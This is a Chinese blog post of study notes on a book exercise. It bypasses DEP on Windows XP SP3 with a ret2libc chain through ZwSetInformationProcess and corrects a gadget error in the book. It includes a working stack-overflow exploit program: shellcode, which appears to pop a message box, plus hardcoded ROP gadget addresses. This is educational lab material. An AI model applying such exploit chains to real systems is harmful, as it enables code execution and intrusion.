记录学习《0Day安全》路上遇到的问题解决方案 利用Ret2Libc挑战DEP

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量794 收藏
点赞数 2
分类专栏: 0day安全学习 文章标签: 解决方案 安全 0-day
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_LiT0/article/details/71156519
版权 
if  __author__ == "LiT0":

0x00 前言

在此节中,首次碰到书本上的错误(大神勿喷,请看完全文。按照我的思路执行成功)
具体在12.3.1节 关于利用ZwSetInformationProcess 的实践实验。实验了一晚上,按照书上一步步来总是出错。经过认真研究发现了一处错误。

系统环境与书上一致 xp sp3 && vc++ 没有gs 和 safeseh

0x01 正文

先过趁热过一遍实验:

首先,经典溢出漏洞without GS—> 直接覆盖函数返回地址—> 找到关闭DEP函数的入口地址—>执行关闭DEP—>回跳执行shellcode
根据流程通过执行

mov eax, 1
retn

step1
进入关闭函数,但是函数在执行过程中写入esp, 而esp在溢出时就被破坏,所以需要修正esp
可以通过

push esp
pop ebp
retn 4

至此,可以成功关闭dep 但是,此时因为函数体里面的代码,破坏了栈,我们失去了程序的控制权。

此前程序按照预想的进行

进行下一步骤: 书上内容所说,使用

pop eax 
retn 28

利用此段代码扩充ebp 和 esp 之间的空间, 使dep关闭函数的压栈行为就不会破坏栈了。

然而,我单步调试执行之后发现执行 pop eax 之后, 会将 dep关闭函数入口地址 出栈,使esp下移,那么retn 返回之后进入的就是错误的地址 如下所示

执行 pop 前:

这里写图片描述

esp 在0x0012fec0

执行pop之后:

这里写图片描述

esp已经+4

那么下一步就会访问 0xFFFF33E9!!

这里写图片描述

0x02解决方案

明白了问题的成因,问题也就迎刃而解。

很明显,只要去掉pop就可以使程序正常返回至关闭DEP函数入口地址

找一个不带pop的 retn 28!

使用插件 pop 设为0 n设为 28 就可以找到了!

这里写图片描述

修改代码如下:

// GS_Virtual.cpp : 定义控制台应用程序的入口点。
//

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>

char shellcode[]= 
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x52\xE2\x90\x7C"  //mov eax, 1    ret
"\x85\x8B\x0F\x5D"  //修正ebp push esp; pop ebp; retn
"\x21\xF7\x80\x7C"  //增大esp  retn 28; <-------------------修改此处,原为pop retn 28
"\x7B\x46\x86\x7C"  //jmp esp;
"\x24\xCD\x91\x7C"  //关dep
"\xE9\x33\xFF\xFF"  //back
"\xFF\x90\x90\x90" 
;

void test()
{
    char tt[176];
    strcpy(tt,shellcode);
}
int main()
{
    HINSTANCE hInst = LoadLibrary("shell32.dll");
    char temp[200];
    test();
    return 0;
}

成功执行

这里写图片描述

lit0
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0day安全》——数据与程序的分水岭:DEP
sunr_的博客
08-31 491
DEP机制的保护原理 溢出攻击的根源在于区分不了代码与数据。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时,程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 DEP 的主要作用是阻止数据页(如默认的堆页、各种堆栈页以及内存池页)执行代码。微软从 Windows XP SP2 开始提供这种技术支持,根据实现的机制不同可分为:软件 DEP( Software DEP)和硬件 DEP( Hardware-enforced DEP
ret2lib bypass dep 学习笔记(0day2Edition NtSetInformationProcess)
Catch me if you can
04-21 2335
DEP绕过ROP(ret2lib)技术总结样本空间测试环境 操作系统:windows xp sp3 工具:immunity debugger 样本源码: #include <stdio.h> #include <string.h> #include <windows.h> char shellcode[]= "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x
0day 第12章--12.4节:利用执行内存挑战DEP
I have a dream
04-07 342
实验环境: winxp sp3 vs2010 实验配置: 关闭DEP、GS、SAFESEH,禁用优化,release版本 思路: 如果进程的内存空间中有一段可读可写可执行的内存,而我们将shellcode复制到该内存,并劫持程序流程,则我们的shellcode就有执行的机会。 具体实施: 利用memcpy函数将shellcode复制到该段内存。 memcpy函数的部署可参考上一节 1、首先找到一段...
什么是0day攻击?什么是Nday漏洞?
logic1001的博客
10-12 1084
0day和Nday漏洞的区别是什么?
7.1 覆盖虚函数突破GS
qq_55202378的博客
10-10 593
GS 溢出
Ret2Libc 实战之利用 ZwSetInformationProcess.zip
06-11
在网络安全领域,Ret2Libc是一种常见的利用技术,主要用于攻击者通过特定的手段将程序执行流导向libc库中的任意函数,从而实现攻击目的。在这个实战案例中,我们关注的是如何利用ntdll库中的ZwSetInformationProcess...
ret2libc2pwn 入门题
02-11
pwn 入门题
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc1pwn 入门题
02-11
pwn 入门题
覆盖虚函数突破GS (踩坑)
weixin_30485291的博客
03-08 273
环境: xp sp3 vs 2008 参考文章: https://bbs.pediy.com/thread-211315.htm https://www.52pojie.cn/thread-490768-1-1.html 《0day安全软件漏洞分析技术》 10.3 节 代码: #include "stdafx.h" #include "string.h" class GSVirtual { pu...
0day安全》堆操作
sunr_的博客
08-25 249
0day2》堆操作 堆的调试 #include "stdafx.h" #include <windows.h> int main() { HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); __asm int 3 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,3); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,5); h3 = Heap
0Day》之通过覆盖虚表指针来突破GS
binghupo的博客
12-05 1048
对于栈溢出,微软做了GS防护,就是在函数栈帧初始化之后,生成一个随机的cookie,将其保存在EBP之前,同时在.data中也保存一份,在函数返回之前,先检测栈中cookie的值,如果我们还用之前栈溢出的方式,通过shellcode覆盖函数返回地址来达到溢出的目的,这时必然会覆盖掉栈中的cookie,这样的溢出就会被检测到,也就无法达到溢出的目的。但是正所谓你有张良计,我有过墙梯,GS的检测要在函
还原0day----覆盖虚函数突破GS
笔记本
05-12 444
接上一篇,与vc++6.0(并没有GS安全机制)不一样的是,vs2008启用GS后的实例内存布局有些不一样,结合0day代码探究下突破GS的具体细节 C++代码:vs2008 release 优化禁用 #include "stdafx.h" #include "string.h" class GSVirtual { public : void gsv(char * src) ...
0day安全》——栈中的守护天使:GS
sunr_的博客
08-26 361
GS安全编译选项 原理 在栈帧中压入一个随机DWORD,IDA称之为“security cookie”,位于EBP之前。系统在.data区块中存放一个security cookie的副本。当栈发生溢出是,security cookie将被覆盖,之后才是EBP和返回地址。函数返回之前比对两者的值,如果改变则说明security cookie已被破坏,发生了溢出。 例外 额外的数据和操作带来的直接后果就是系统性能的下降,为了将对性能的影响降到最小,编译器在编译程序的时候并不是对所有的函数都应用 GS,以下情况
0day 第10章--10.3:覆盖虚函数突破GS
I have a dream
11-01 435
实验环境:winxp sp3 vs2010 实验要求:程序要求禁用优化、release版本 实验原理:程序只有在函数返回时才检查Security Cookie,如果在函数检查之前劫持程序流程,就能实现缓冲区溢出了!因此可以利用C++中的虚函数!(为什么?见0day第6章攻击C++虚函数) [C++虚函数原理] {虚表指针-&amp;gt;虚表-&amp;gt;函数地址,call函数地址} 总结一下入的坑: (1)...
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 528
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 669
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1147
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值